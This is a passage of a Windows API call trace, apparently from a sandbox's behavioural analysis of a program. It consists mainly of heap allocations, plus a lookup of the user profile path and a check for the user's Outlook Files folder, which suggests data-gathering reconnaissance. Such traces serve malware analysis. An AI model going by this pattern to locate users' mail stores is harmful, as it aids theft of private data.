(HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0265.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0265.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0265.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0265.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0265.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0265.824] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0265.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0265.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0265.825] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0265.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17d8 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17b8 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0265.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0265.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0265.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0265.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0265.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0265.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0265.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.829] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.829] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0265.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0265.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.829] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.829] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.830] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.831] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.831] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.832] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Outlook Files", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb4e0047, dwReserved1=0x28d04, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 0xaa5860 [0265.832] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0265.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.832] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.833] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.833] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.834] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.834] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.834] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.834] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.834] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.834] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.835] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.835] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.835] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.835] 